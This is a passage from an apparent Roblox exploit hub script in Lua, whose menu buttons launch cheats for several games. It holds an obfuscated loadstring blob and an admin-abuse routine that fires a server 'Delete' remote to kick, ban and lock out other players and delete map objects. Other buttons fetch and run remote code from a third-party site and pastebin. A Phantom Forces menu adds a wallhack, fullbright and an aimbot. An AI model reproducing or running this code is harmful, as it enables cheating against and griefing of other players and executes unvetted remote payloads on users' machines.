SkCDcs11SQGaaFQHccOvlUHAAAAT0p+bWFpAFUEAAAAYml7APP5OC1wCZUYyvPIZ3PwFCTcSvNpLb7uHGkiylUFAAAAe21leADzyGfzjN80VEvzyGdz8BTXAUrzyGdz8BR5AkrzyGdz8BSgGkrzyGfT1IvDVkvKqyec"),getfenv())() end) kohlsadminhousenbc.Name = "kohlsadminhousenbc" kohlsadminhousenbc.Parent = Main kohlsadminhousenbc.BackgroundColor3 = Color3.new(1, 1, 1) kohlsadminhousenbc.Position = UDim2.new(0.0158273429, 0, 0.34256056, 0) kohlsadminhousenbc.Size = UDim2.new(0, 200, 0, 25) kohlsadminhousenbc.Font = Enum.Font.SourceSans kohlsadminhousenbc.Text = "Kohls Admin House NBC" kohlsadminhousenbc.TextColor3 = Color3.new(0, 0, 0) kohlsadminhousenbc.TextSize = 20 kohlsadminhousenbc.MouseButton1Down:connect(function() --kohls admin house nbc warn("Kohls Admin House NBC Admin") print("Written by: Bloxy") slock = false plr = game:GetService("Players").LocalPlayer prefix = ":" banned = {} function GetPlayer(String) -- timeless/xfunnieuss local Found = {} local strl = String:lower() if strl == "all" then for i,v in pairs(game:GetService("Players"):GetPlayers()) do table.insert(Found,v) end elseif strl == "others" then for i,v in pairs(game:GetService("Players"):GetPlayers()) do if v.Name ~= game:GetService("Players").LocalPlayer.Name then table.insert(Found,v) end end elseif strl == "me" then for i,v in pairs(game:GetService("Players"):GetPlayers()) do if v.Name == game:GetService("Players").LocalPlayer.Name then table.insert(Found,v) end end else for i,v in pairs(game:GetService("Players"):GetPlayers()) do if v.Name:lower():sub(1, #String) == String:lower() then table.insert(Found,v) end end end return Found end plr.Chatted:Connect(function(msg) if string.sub(msg, 1, 11) == (prefix.."btools me") then wait(1) for i,v in pairs(game:GetService("Players").LocalPlayer.Backpack:GetChildren()) do if v:IsA'Tool' then v.CanBeDropped = true warn("you can now drop btools.") end end end end) plr.Chatted:Connect(function(msg) if string.sub(msg, 1, 6) == (prefix.."kick ") then for i,v in pairs(GetPlayer(string.sub(msg, 7))) do local remote = game:GetService("Workspace").Delete.delete remote:FireServer(v) wait() print("Kicked:", v.Name) end end end) plr = game:GetService("Players").LocalPlayer plr.Chatted:Connect(function(ok) if string.sub(ok, 1) == (prefix.. "admin") then now = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Workspace").Terrain.GameFolder.Admin.Pads['Touch to get admin'].Head.CFrame wait(0.2) game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = now end end) plr.Chatted:connect(function(wtf) if string.sub(wtf, 1) == (prefix.. "shutdown") then for i,v in pairs(game:GetService("Players"):GetPlayers()) do if v~= plr then local remote = game:GetService("Workspace").Delete.delete remote:FireServer(v) end end end end) plr.Chatted:connect(function(lol) if string.sub(lol, 1) == (prefix.. "slock") then slock = true warn'Server Locked!' end end) plr.Chatted:Connect(function(oyes) if string.sub(oyes, 1) == (prefix.. "unslock") then slock = false warn'Server Unlocked!' end end) plr.Chatted:connect(function(wtf) if string.sub(wtf, 1) == (prefix.. "shutdown") then wait(0.7) plr:Kick'Shutdown game.' end end) game:GetService("Players").PlayerAdded:connect(function(xDDD) if slock == true then local remote = game:GetService("Workspace").Delete.delete remote:FireServer(xDDD) wait() warn("Someone tried to join:", xDDD.Name, "-SLOCKED") end end) plr.Chatted:Connect(function(xd) if string.sub(xd, 1) == (prefix.. "rworkspace") then local remote = game:GetService("Workspace").Delete.delete remote:FireServer(Workspace.Terrain.GameFolder) remote:FireServer(Workspace.Terrain.GameFolder) end end) plr.Chatted:Connect(function(msg) if string.sub(msg, 1, 5) == (prefix.."ban ") then for i,v in pairs(GetPlayer(string.sub(msg, 6))) do table.insert(banned,v.Name) local remote = game:GetService("Workspace").Delete.delete remote:FireServer(v) wait() print("Banned:", v.Name) end end end) game:GetService("Players").PlayerAdded:connect(function(x) wait(0.25) for i,v in pairs(banned) do if x.Name == v then local remote = game:GetService("Workspace").Delete.delete remote:FireServer(x) wait() warn("Someone tried to join:", x.Name, "-BANNED") end end end) plr.Chatted:Connect(function(rEE) if string.sub(rEE, 1, 12) == (prefix.."radminpads") then local remote = game:GetService("Workspace").Delete.delete remote:FireServer(game:GetService("Workspace").Terrain.GameFolder.Admin.Pads) end end) plr.Chatted:Connect(function(xAr) if string.sub(xAr, 1, 8) == (prefix.."rregen") then local remote = game:GetService("Workspace").Delete.delete remote:FireServer(game:GetService("Workspace").Terrain.GameFolder.Admin.Regen) end end) plr.Chatted:Connect(function(wE) if string.sub(wE, 1, 7) == (prefix.."robby") then local remote = game:GetService("Workspace").Delete.delete remote:FireServer(game:GetService("Workspace").Terrain.GameFolder.Workspace.Obby) end end) plr.Chatted:Connect(function(ssA) if string.sub(ssA, 1, 11) == (prefix.."banlist") then for i,v in pairs(banned) do warn("----------------") print(v) end end end) end) dashingsimulator.Name = "dashingsimulator" dashingsimulator.Parent = Main dashingsimulator.BackgroundColor3 = Color3.new(1, 1, 1) dashingsimulator.Position = UDim2.new(0.325179845, 0, 0.235294119, 0) dashingsimulator.Size = UDim2.new(0, 200, 0, 25) dashingsimulator.Font = Enum.Font.SourceSans dashingsimulator.Text = "Dashing Simulator" dashingsimulator.TextColor3 = Color3.new(0, 0, 0) dashingsimulator.TextSize = 25 dashingsimulator.MouseButton1Down:connect(function() loadstring(game:HttpGet('https://nto.darkdevs.pro/uploads/dash.txt',true))() end) phantomforces.Name = "phantomforces" phantomforces.Parent = Main phantomforces.BackgroundColor3 = Color3.new(1, 1, 1) phantomforces.Position = UDim2.new(0.325179845, 0, 0.34256056, 0) phantomforces.Size = UDim2.new(0, 200, 0, 25) phantomforces.Font = Enum.Font.SourceSans phantomforces.Text = "Phantom Forces" phantomforces.TextColor3 = Color3.new(0, 0, 0) phantomforces.TextSize = 25 phantomforces.MouseButton1Down:connect(function() --[[ __/\\\\____________/\\\\_________________________________________________________ _\/\\\\\\________/\\\\\\_________________________________________________________ _\/\\\//\\\____/\\\//\\\_________________________________________________________ _\/\\\\///\\\/\\\/_\/\\\_____/\\\\\_____/\\/\\\\\\\___/\\\\\\\\\\_____/\\\\\\\\__ _\/\\\__\///\\\/___\/\\\___/\\\///\\\__\/\\\/////\\\_\/\\\//////____/\\\/////\\\_ _\/\\\____\///_____\/\\\__/\\\__\//\\\_\/\\\___\///__\/\\\\\\\\\\__/\\\\\\\\\\\__ _\/\\\_____________\/\\\_\//\\\__/\\\__\/\\\_________\////////\\\_\//\\///////___ _\/\\\_____________\/\\\__\///\\\\\/___\/\\\__________/\\\\\\\\\\__\//\\\\\\\\\\_ _\///______________\///_____\/////_____\///__________\//////////____\//////////__ FIRST PERSON SHOOTERS ------------------------ -: CHANGELOG :- ------------------------ v1.21: - Chams Fix v1.4: - Fullbright --]] local World = game:GetService('Workspace'); local Input = game:GetService('UserInputService'); local Lighting = game:GetService("Lighting"); local Players = game:GetService('Players'); local Player = Players['LocalPlayer']; local Keys = {} local Misc = { CharFunctions = getmetatable(newproxy(true)); GUIColors = { On = Color3.fromRGB(46, 105, 132); Off = Color3.new(.38, .38, .38); }; ChamsColors = { {'White', Color3.new(1, 1, 1)}; {'Black', Color3.new(0, 0, 0)}; {'Red', Color3.new(1, 0, 0)}; {'Green', Color3.new(0, 1, 0)}; {'Blue', Color3.new(0, 0, 1)}; {'Purple', Color3.new(0.65, 0, 0.65)}; {'Yellow', Color3.new(1, 1, 0)}; {'Grey', Color3.new(0.8, 0.8, 0.8)}; } } local function GetFunc(t, i) for __, ___ in next, (t) do if string.lower(i):match(__:lower()) then return ___, __ end end end local function GetColor(t, i) for __, ___ in next, (t) do if (___[1] == i) then return ___, __ elseif (___[2] == i) then return ___, __ end end end local Settings = { {'Menu', false, Enum.KeyCode.Delete}; {'Team Chams [\'COLOR\']', true, 'Toggle'}; {'Enemy Chams [\'COLOR\']', true, 'Toggle'}; {'Chams Transparency', false, '0'}; {'Fullbright', true, 'MAX'}; -- {'ESP', true, 'N/A'}; {'Aimbot [Not PF]', true, 'Toggle'}; } ------------ [[ GUI SPAWN ]] ------------ FormAssets = function() ------ ERROR MAGIC ------ local __ERROR__ = Instance.new('BindableEvent') __ERROR__['Event']:Connect(error) --------- CREATE FUNCTION --------- local create = function(class, parent) local instance = Instance.new(class); return function(props) for property, value in next, (props) do if (property ~= 'Parent') and (typeof(value) ~= 'Instance') then local suc, err = pcall(function() instance[property] = value end) if not suc then __ERROR__:Fire('[Script->Asset]: ' .. err) end elseif (property == 'Parent') then parent = value end end if parent and (typeof(parent) == 'Instance') then instance['Parent'] = parent end return instance end end ------------------------------------- ------------------------------------- -- SOME THINGS MAY BE OUT OF ORDER -- ----(INSTANCE RELATED PROPERTIES)---- -------------(UNLIKELY)-------------- ------------------------------------- ------------------------------------- local Main = create('ScreenGui'){ Name = "FPS Hacks - Menu" } local Folder = create('Folder', Main){ Name = 'Chams' } local Folder1 = create('Folder', Folder){ Name = 'Team' } local Folder2 = create('Folder', Folder){ Name = 'Enemy' } local Frame = create('Frame', Main){ Name = "Main"; BackgroundColor3 = Color3.new(1, 1, 1); BackgroundTransparency = 1; Position = UDim2.new(0.5, 0, 0.5, 0); Size = UDim2.new(0, 250, 0, 190); Draggable = true; Active = true; AnchorPoint = Vector2.new(0.5, 0.5); Transparency = 1 } local TextLabel = create('TextLabel', Frame){ Name = "Title"; BackgroundColor3 = Color3.new(0.180392, 0.411765, 0.517647); BorderSizePixel = 0; Size = UDim2.new(1, 0, 0, 35); Text = "FPS Hacks"; TextColor3 = Color3.new(0.866667, 0.843137, 0.843137); Font = Enum.Font.SciFi; FontSize = Enum.FontSize.Size28; TextWrapped = true } local ScrollingFrame = create('ScrollingFrame', Frame){ Name = "Buttons"; BackgroundColor3 = Color3.new(1, 1, 1); BackgroundTransparency = 1; BorderSizePixel = 0; Position = UDim2.new(0.5, 0, 0, 40); CanvasSize = UDim2.new(0, 0, 0, 0); Size = UDim2.new(1, 0, 0, 260); AnchorPoint = Vector2.new(0.5, 0); Transparency = 1 } local Frame1 = create('Frame'){ BackgroundColor3 = Color3.new(1, 1, 1); BackgroundTransparency = 1; BorderSizePixel = 0; Position = UDim2.new(0, 0, 0, 1); Selectable = true; Size = UDim2.new(1, 0, 0, 25); ClipsDescendants = true; Transparency = 1 } local TextLabel1 = create('TextButton', Frame1){ Name = "Text"; BackgroundColor3 = Color3.new(1, 1, 1); BorderColor3 = Color3.new(0.180392, 0.411765, 0.517647); Position = UDim2.new(0.100000001, 0, 0, 0); Size = UDim2.new(0.600000024, 0, 1, 0); Text = "Example"; TextColor3 = Color3.new(0.180392, 0.411765, 0.517647); Font = Enum.Font.SciFi; FontSize = Enum.FontSize.Size14 } local Frame2 = create('Frame', Frame1){ Name = "Status"; BackgroundColor3 = Color3.new(0, 1, 0); BorderSizePixel = 0; Position = UDim2.new(0.0250000004, 0, 0.5, 0); Size = UDim2.new(0, 7, 0, 7); Style = Enum.FrameStyle.DropShadow; AnchorPoint = Vector2.new(0, 0.5) } local TextButton = create('TextButton', Frame1){ Name = "Key"; BackgroundColor3 = Color3.new(0.180392, 0.411765, 0.517647); BackgroundTransparency = 0.5; BorderSizePixel = 0; Position = UDim2.new(0.699999988, 0, 0, 0); Size = UDim2.new(0.300000012, 0, 1, 0); Text = "[EXAMPLE]"; TextColor3 = Color3.new(0.839216, 0.839216, 0.839216); Font = Enum.Font.SciFi; FontSize = Enum.FontSize.Size14; TextStrokeColor3 = Color3.new(0.380392, 0.380392, 0.380392); TextStrokeTransparency = 0; Transparency = 0.5 } local UIListLayout = create('UIListLayout', ScrollingFrame){ Padding = UDim.new(0, 4); HorizontalAlignment = Enum.HorizontalAlignment.Center } local UIPadding = create('UIPadding', ScrollingFrame){} return create, Main, Frame1, Folder end local Create, Menu, Button, Chams = FormAssets() local TDB = false local EDB = false local Functions = { ['Menu'] = function() Menu['Enabled'] = not (Menu['Enabled']); end; ['Team Chams'] = function() if TDB then return end TDB = true Settings['TCO'] = not (Settings['TCO']) if Settings['TCO'] then Misc['CharFunctions'] ['TCCH'] = function(char) local Target = Players:GetPlayerFromCharacter(char) if (Target == Player) or (Target.TeamColor ~= Player.TeamColor) then return end local Folder = Chams['Team']:FindFirstChild(Target['Name']) or Create('Folder', Chams['Team']){Name = Target['Name']} for __, part in next, (char:GetChildren()) do if part:IsA('BasePart') then Create('BoxHandleAdornment', Folder) { Name = part.Name .. '_CHAM'; Color3 = Settings['TCC'][2]; AlwaysOnTop = true; Transparency = Settings['CT']; Visible = true; ZIndex = 10; Size = (part['Name'] == 'Head' and Vector3.new(1.25, 1.3, 1.25)) or (Vector3.new(.5, .5, .5) + part.Size) }['Adornee'] = part end end end elseif Misc['CharFunctions']['TCCH'] then Misc['CharFunctions']['TCCH'] = nil Chams['Team']:ClearAllChildren() end TDB = false end; ['Enemy Chams'] = function() if EDB then return end EDB = true Settings['ECO'] = not (Settings['ECO']) if Settings['ECO'] then Misc['CharFunctions'] ['ECCH'] = function(char) local Target = Players:GetPlayerFromCharacter(char) if (Target == Player) or (Target.TeamColor == Player.TeamColor) then return end local Folder = Chams['Enemy']:FindFirstChild(Target['Name']) or Create('Folder', Chams['Enemy']){Name = Target['Name']} for __, part in next, (char:GetChildren()) do if part:IsA('BasePart') then Create('BoxHandleAdornment', Folder) { Name = part.Name .. '_CHAM'; Color3 = Settings['ECC'][2]; AlwaysOnTop = true; Transparency = Settings['CT']; Visible = true; ZIndex = 10; Size = (part['Name'] == 'Head' and Vector3.new(1.25, 1.3, 1.25)) or (Vector3.new(.5, .5, .5) + part.Size) }['Adornee'] = part end end end elseif Misc['CharFunctions']['ECCH'] then Misc['CharFunctions']['ECCH'] = nil Chams['Enemy']:ClearAllChildren() end EDB = false end; ['Chams Transparency'] = function(t) if t then local Trans = Settings['CT'] Settings['CT'] = (Trans < .8 and Trans + (1/10)) or 0 end local TeamCham = Chams['Team']:GetChildren() local EnemyCham = Chams['Enemy']:GetChildren() for __, object in next, (TeamCham) do for __, bha in next, (object:GetChildren()) do bha.Transparency = Settings['CT'] bha.Color3 = Settings['TCC'][2] end end for __, object in next, (EnemyCham) do for __, bha in next, (object:GetChildren()) do bha.Transparency = Settings['CT'] bha.Color3 = Settings['ECC'][2] end end Menu['Main']['Buttons']['Frans']['Key'].Text = '[' .. tostring(Settings['CT']) .. ']' end; ['Fullbright'] = function(Toggle, TextBox) local Fullbright = Settings.Fullbright if Toggle then Fullbright.On = not (Fullbright.On); end local function Handle() local Setting = Fullbright.Options[Fullbright.Current] local Settings = Fullbright.OptionDefs[Setting] TextBox['Text'] = '[' .. Setting .. ']' Lighting.Ambient = Settings.InAmbience; Lighting.OutdoorAmbient = Settings.OutAmbience; Lighting.Brightness = Settings.Brightness; Lighting.FogStart = Settings.Fog; Lighting.FogEnd = Settings.Fog; end if (not Fullbright.On) then Fullbright.Current = 3 end Handle() end; ['Aimbot'] = function(l) l:Destroy() local IgnorePlayersNamed = {NAME=true} -- Name = true or false --[[ [J] - To go down the list. [U] - To go up the list. [H] - To toggle that item in the list. [RMB] - To aim at your target using the current settings. (THIS UPDATES IN LIVE TIME SO YOU DON'T HAVE TO STOP AIMING FOR IT TO TAKE EFFECT) --]] local services = setmetatable({ World = game:GetService('Workspace'); Players = game:GetService('Players'); Input = game:GetService('UserInputService'); Run = game:GetService('RunService'); UI = game:GetService('StarterGui'); },{ __index = function(tab,index) local serv local ran,err = pcall(function() serv=game:service(index) end) if ran then tab[index] = serv return serv end end }) local cre = Create local ResizeUI = function(ui,downscale,byclass) if not rawequal(ui['ClassName'],'ScrollingFrame') then return end local count = 0; for __, asset in next, (ui:GetChildren()) do if rawequal(asset['ClassName'],byclass) then count = count + 1 end end ui['CanvasSize'] = UDim2.new(ui.CanvasSize.X.Scale,ui.CanvasSize.X.Offset,ui.CanvasSize.Y.Scale,downscale*count) end local wfc, ffc, ffoc, cast, ray = services.World.WaitForChild, services.World.FindFirstChild, services.World.FindFirstChildOfClass, services.World.FindPartOnRayWithIgnoreList, Ray.new local wfcoc = function(p,class) local obj repeat services.Run.RenderStepped:wait() obj = p:FindFirstChildOfClass(class) until obj return obj end local Client = services.Players.LocalPlayer local ClientUI = wfc(Client,'PlayerGui') local ClientMouse = Client:GetMouse() local ClientModel = Client.Character or Client.CharacterAdded:wait() local ClientCamera = services.World.CurrentCamera local ClientHumanoid = wfcoc(ClientModel,'Humanoid') local ClientActiveUI; local status = { Enabled = false, TeamCheck = false, HeadsOnly = false, RayCheck = true, AutoAim = false, } local function toggle(button) local option, val = button['Text']:match('(.*):%s*(.*)') status[option] = not status[option] if status[option] then button.TextColor3 = Color3.fromRGB(0,255,0) else button.TextColor3 = Color3.fromRGB(255,0,0) end button.Text = option .. ': ' .. tostring(status[option]) end local selection = {} local select_pos = 1 local current_pos = 0 local __ = function() if ffc(game:GetService("CoreGui"), '___') then return end local GUI = cre('ScreenGui',game:GetService('CoreGui')){ Name = '___'; } local Frame = cre('ScrollingFrame',GUI){ BackgroundTransparency = 1, BorderSizePixel = 0, Name = 'Options', Position = UDim2.new(.8,0,.915,0), Size = UDim2.new(.2,0,0,30), ZIndex = 10, ClipsDescendants = true, CanvasSize = UDim2.new(0,0,0,0), ScrollBarThickness = 0, ScrollingEnabled = false, } local UILL = cre('UIListLayout',Frame){ Name = 'LayoutHandler', FillDirection = 'Vertical', HorizontalAlignment = 'Center', SortOrder = 'LayoutOrder', VerticalAlignment = 'Top' } local Template = cre('TextButton',nil){ BackgroundTransparency = 1, BorderSizePixel = 0, Name = 'Template', Size = UDim2.new(.9,0,0,30), Font = 'SciFi', Text = '', TextColor3 = Color3.fromRGB(255,255,255), TextScaled = true, TextWrapped = true, } local TSC = cre('UISizeConstraint',Template){ Name = 'TemplateSizeConstraint', MaxSize = Vector2.new(math.huge,30), } Frame['ChildAdded']:connect(function() ResizeUI(Frame,30,'TextButton') end) local sel_pos = 0 for option, val in next, status do local tp = Template:Clone() tp.Name = option tp.Text = option .. ': ' .. tostring(val) if status[option] then tp.TextColor3 = Color3.fromRGB(0,255,0) else tp.TextColor3 = Color3.fromRGB(255,0,0) end sel_pos = sel_pos + 1 selection[sel_pos] = tp tp.Parent = Frame end Frame.CanvasPosition = Vector2.new(0, current_pos) return Frame end Client['CharacterAdded']:connect(function(c) ClientModel = c ClientHumanoid = wfcoc(ClientModel,'Humanoid') ClientActiveUI.Parent.Parent = nil ClientActiveUI = coroutine.wrap(__)() end) ClientActiveUI = coroutine.wrap(__)() local right_down, keylogs, inputlogs = nil, {}, {} services.Input.InputBegan:connect(function(input, procc) keylogs[input.KeyCode],inputlogs[input.UserInputType] = true, true; if not ClientActiveUI then return end if keylogs[Enum.KeyCode.U] and current_pos >= 30 then select_pos = select_pos - 1 current_pos = current_pos - 30 ClientActiveUI.CanvasPosition = Vector2.new(0,current_pos) elseif keylogs[Enum.KeyCode.J] and current_pos < ClientActiveUI.CanvasSize.Y.Offset - 30 then select_pos = select_pos + 1 current_pos = current_pos + 30 ClientActiveUI.CanvasPosition = Vector2.new(0,current_pos) elseif keylogs[Enum.KeyCode.H] then if selection[select_pos] then toggle(selection[select_pos]) end end end) services.Input.InputEnded:connect(function(input, procc) keylogs[input.KeyCode],inputlogs[input.UserInputType] = false, false; end) local function GetPlayerFromCharacter(mod) if not mod:IsA('Model') then return end for __, client in next, services.Players:GetPlayers() do if rawequal(string.lower(client['Name']):sub(1,#mod['Name']),mod['Name']:lower()) then return client, client['Name'] end end return nil, 'N/A' end local function Search() local t = {} for __, child in next, services.World:GetChildren() do local UserFromCharacter = GetPlayerFromCharacter(child) if UserFromCharacter then if child:IsA('Model') and not rawequal(UserFromCharacter,Client) then local h = ffoc(child,'Humanoid') if h and h.Health > 0 then table.insert(t, {child,UserFromCharacter}) end end end end return t end local function cast_ray(p0,p1,blacklist) local Part local __=0 repeat __=__+1 local cond=(p1-p0).magnitude < 999 Part,p0=cast(workspace,ray(p0,cond and p1-p0 or (p1-p0).unit*999),blacklist) if Part then if Part.CanCollide==false or Part.Transparency==1 then blacklist[#blacklist+1]=Part Part=nil end elseif cond or __ > 15 then break end until Part return Part,p0 end services.Run.RenderStepped:connect(function() local Storage = {} if status['Enabled'] and (inputlogs[Enum.UserInputType.MouseButton2] or status['AutoAim']) then Storage = Search() local dot, face = -1 for __, info in next, (Storage) do local h = ffc(info[1],'Humanoid') local skip; if not inputlogs[Enum.UserInputType.MouseButton2] and not status['AutoAim'] then return end if not info[1] or not info[2] or IgnorePlayersNamed[info[2]['Name']] or ffoc(info[1],'ForceField') then skip = true end if not ffc(info[1],'HumanoidRootPart') then skip = true end if h and h['Health'] > 0 then if status['TeamCheck'] then if Client['TeamColor'] == info[2]['TeamColor'] then skip = true end end if not skip then local cc = ClientCamera.CFrame local pos = status['HeadsOnly'] and info[1]['Head'].CFrame.p or info[1]['HumanoidRootPart'].Position local HitPart=cast_ray(cc.p,pos,{ClientCamera,ClientModel}) if not (status['RayCheck'] and HitPart) or info[1]:IsAncestorOf(HitPart) then local m = (pos-cc.p).unit:Dot(cc.lookVector) if rawequal(m,m) and m > dot then dot, face= m, pos end end end end end if face then ClientCamera.CFrame = CFrame.new(ClientCamera.CFrame.p,face) * CFrame.new(0,0,0.5) end end end) end } Settings = (function() local NewSettings = { --- Chams --- CT = 0; -- Transparency TCO = false; -- Team Chams On ECO = false; -- Enemy Chams On TCC = GetColor(Misc.ChamsColors, 'Grey'); -- Current Team Chams Color ECC = GetColor(Misc.ChamsColors, 'Red'); -- Current Enemy Chams Color --- Fullbright --- Fullbright = { On = false; Current = 1; Options = {'Max','Half','Default'}; OptionDefs = { Max = { Fog = 1000000; Brightness = 10; InAmbience = Color3.new(1, 1, 1); OutAmbience = Color3.new(1, 1, 1); }; Half = { Fog = 250; Brightness = 1.5; InAmbience = Color3.new(0.6, 0.6, 0.6); OutAmbience = Color3.new(0.6, 0.6, 0.6); }; Default = { Fog = Lighting.FogEnd; Brightness = Lighting.Brightness; InAmbience = Lighting.Ambient; OutAmbience = Lighting.OutdoorAmbient; } } } } for __, option in next, (Settings) do local NewOption = Button:Clone() if option[1] == 'Menu' or option[1] == 'Chams Transparency' then NewOption['Status']['Style'] = 'Custom'; NewOption['Key']['TextStrokeColor3'] = Misc.GUIColors.On end NewOption['Text'].Text = option[1]:match('COLOR') and ( (option[1]:match('Team') and option[1]:gsub('COLOR', NewSettings.TCC[1])) or (option[1]:match('Enemy') and option[1]:gsub('COLOR', NewSettings.ECC[1])) ) or option[1] NewOption['Key'].Text = '['.. ((typeof(option[3]) == 'EnumItem' and option[3].Name) or option[3]) .. ']' NewOption.Parent = Menu['Main']['Buttons'] if option[1] == 'Chams Transparency' then NewOption['Name'] = 'Frans' end local Func, Name = GetFunc(Functions, option[1]) if Func then NewOption['Text']['MouseButton1Down']:connect(function() if not option[2] then return end if NewOption.Status.Style.Name == 'DropShadow' then NewOption.Status.Style = 'Custom' elseif NewOption.Status.Style.Name == 'Custom' then NewOption.Status.Style = 'DropShadow' end if option[1]:match('Aimbot') then Func(NewOption) elseif option[1]:match('Fullbright') then Func(true, NewOption['Key']) else Func() end end) if option[3] == 'Toggle' then if Name:match('Team') then NewOption['Key']['MouseButton1Down']:connect(function() local Tab, Pos = GetColor(Misc.ChamsColors, NewSettings.TCC[2]) if (Pos + 1) < #Misc.ChamsColors then NewOption['Text'].Text = NewOption['Text'].Text:gsub(NewSettings.TCC[1], Misc.ChamsColors[Pos + 1][1]) NewSettings.TCC = Misc.ChamsColors[Pos + 1] else NewOption['Text'].Text = NewOption['Text'].Text:gsub(NewSettings.TCC[1], Misc.ChamsColors[1][1]) NewSettings.TCC = Misc.ChamsColors[1] end GetFunc(Functions, 'Chams Transparency')() end) elseif Name:match('Enemy') then NewOption['Key']['MouseButton1Down']:connect(function() local Tab, Pos = GetColor(Misc.ChamsColors, NewSettings.ECC[2]) if (Pos + 1) < #Misc.ChamsColors then NewOption['Text'].Text = NewOption['Text'].Text:gsub(NewSettings.ECC[1], Misc.ChamsColors[Pos + 1][1]) NewSettings.ECC = Misc.ChamsColors[Pos + 1] else NewOption['Text'].Text = NewOption['Text'].Text:gsub(NewSettings.ECC[1], Misc.ChamsColors[1][1]) NewSettings.ECC = Misc.ChamsColors[1] end GetFunc(Functions, 'Chams Transparency')() end) end elseif option[1] == 'Chams Transparency' then NewOption['Key']['MouseButton1Down']:connect(function() GetFunc(Functions, 'Chams Transparency')(true) end) elseif option[1] == 'Fullbright' then NewOption['Key']['MouseButton1Down']:connect(function() local Fullbright = Settings.Fullbright if not Fullbright.On then return end if Fullbright.Current < #Fullbright.Options then Fullbright.Current = Fullbright.Current + 1 else Fullbright.Current = 1 end GetFunc(Functions, 'Fullbright')(false, NewOption['Key']) end) end end end return NewSettings end)() setmetatable(Misc['CharFunctions'], { __newindex = function(s, i, v) rawset(Misc['CharFunctions'], i, v) for __, player in next, (Players:GetPlayers()) do if player.Character then v(player.Character) end end end }) local CharFix = function(char) local Target = Players:GetPlayerFromCharacter(char) local Team = Chams['Team']:FindFirstChild(Target['Name']) local Enemy = Chams['Enemy']:FindFirstChild(Target['Name']) if Team then for __, handle in next, (Team:GetChildren()) do if handle['Adornee'] and not handle['Adornee']:IsDescendantOf(game) then handle['Parent'] = nil end end end if Enemy then for __, handle in next, (Enemy:GetChildren()) do if handle['Adornee'] and not handle['Adornee']:IsDescendantOf(game) then handle['Parent'] = nil end end end end local CharAbuse = function(char) wait() for __, func in next, (Misc['CharFunctions']) do coroutine.wrap(func)(char) end char['Changed']:connect(function(prop) if (prop == 'Parent') then CharFix(char) end end) end for __, player in next, (Players:GetPlayers()) do player['CharacterAdded']:connect(CharAbuse) end Players.PlayerAdded:connect(function(Client) Client['CharacterAdded']:connect(CharAbuse) end) Players.PlayerRemoving:connect(function(Client) local Team = Chams['Team']:FindFirstChild(Client['Name']) local Enemy = Chams['Enemy']:FindFirstChild(Client['Name']) if Team then Team['Parent'] = nil end if Enemy then Enemy['Parent'] = nil end end) Input['InputBegan']:connect(function(input, og) if og then return end if input.UserInputType == Enum.UserInputType.Keyboard then if input.KeyCode == Enum.KeyCode.Delete then Functions['Menu']() end end end) Menu.Parent = game:GetService("CoreGui") end) beeswarmsimulator.Name = "beeswarmsimulator" beeswarmsimulator.Parent = Main beeswarmsimulator.BackgroundColor3 = Color3.new(1, 1, 1) beeswarmsimulator.Position = UDim2.new(0.325179845, 0, 0.460207611, 0) beeswarmsimulator.Size = UDim2.new(0, 200, 0, 25) beeswarmsimulator.Font = Enum.Font.SourceSans beeswarmsimulator.Text = "Bee Swarm Simulator" beeswarmsimulator.TextColor3 = Color3.new(0, 0, 0) beeswarmsimulator.TextSize = 25 beeswarmsimulator.MouseButton1Down:connect(function() loadstring(game:HttpGet('https://pastebin.com/raw/5mUPh6fD',true))() end) lumbertycoon2.Name = "lumbertycoon2" lumbertycoon2.Parent = Main lumbertycoon2.BackgroundColor3 = Color3.new(1, 1, 1) lumbertycoon2.Position = UDim2.new(0.325179845, 0, 0.56055361, 0) lumbertycoon2.Size = UDim2.new(0, 200, 0, 25) lumbertycoon2.Font = Enum.Font.SourceSans lumbertycoon2.Text = "Lumber Tycoon 2" lumbertycoon2.TextColor3 = Color3.new(0, 0, 0) lumbertycoon2.TextSize = 25 lumbertycoon2.MouseButton1Down:connect(function() --[[ UI and 90% of scripting scripted from scratch by DrSTaTTiK I know I didn't ask for sigmas GreyWood script but credit to him the user by the name of joseph2235(Your're welcome) provided the script made by sigma. Please give to ye boy DrSTaTTiK credit for his work. THANKS!! --]] local service = setmetatable({}, { __index = function(t, k) return game:GetService(k) end }) if service.Players.LocalPlayer.PlayerGui:FindFirstChild("DrSTaTTiK") then service.Players.LocalPlayer.PlayerGui:FindFirstChild("DrSTaTTiK"):Destroy() end function Create(cls,props) local inst = Instance.new(cls) for i,v in pairs(props) do inst[i] = v end return inst end local HitPoints={ ['GoldAxe']= 50; ['BasicHatchet']= 0.2; ['Axe1']= 0.55; ['Axe2']= 0.93; ['AxeAlphaTesters']= 1.5; ['Rukiryaxe']= 1.68; ['Axe3']= 1.45; ['AxeBetaTesters']= 1.45; ['FireAxe']= 0.6; ['SilverAxe']= 1.6; ['EndTimesAxe']= 10000000; ['AxeChicken']= 0.1; ['CandyCaneAxe']= 0; } local WayPointss = { ["Spawn"] = CFrame.new(155, 3, 74), ["Wood R Us"] = CFrame.new(265, 3, 57), ["Land Store"] = CFrame.new(258, 3, -99), ["Dock"] = CFrame.new(1114, -1, -197), ["Link's Logic"] = CFrame.new(4605, 3, -727), ["Cave"] = CFrame.new(3581, -179, 430), ["Volcano"] = CFrame.new(-1585, 622, 1140), ["Swamp"] = CFrame.new(-1209, 132, -801), ["Palm Island"] = CFrame.new(2549, -5, -42), ["Fancy Furnishings"] = CFrame.new(491, 3, -1720), ["Boxed Cars"] = CFrame.new(509, 3, -1463), ["Fine Arts Shop"] = CFrame.new(5207, -166, 719), ["Bob's Shack"] = CFrame.new(260, 8, -2542), ["Bridge"] = CFrame.new(113, 11, -977), ["End Times"] = CFrame.new(113, -214, -951), ["Shrine of Sight"] = CFrame.new(-1600, 195, 919), ["The Den"] = CFrame.new(323, 41, 1930), ["Volcano Win"] = CFrame.new(-1675, 348, 1476), ["Ski Lodge"] = CFrame.new(1244, 62, 2306), ["Strange Man"] = CFrame.new(1061, 16, 1131) } function GetAxe() if service.Players.LocalPlayer.Character:FindFirstChild("Tool") then return service.Players.LocalPlayer.Character:FindFirstChild("Tool") end end local Walk=16 local Jump=100 function god() game:GetService("Players").LocalPlayer.Character.Humanoid.Name = "1" local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone() l.Parent = 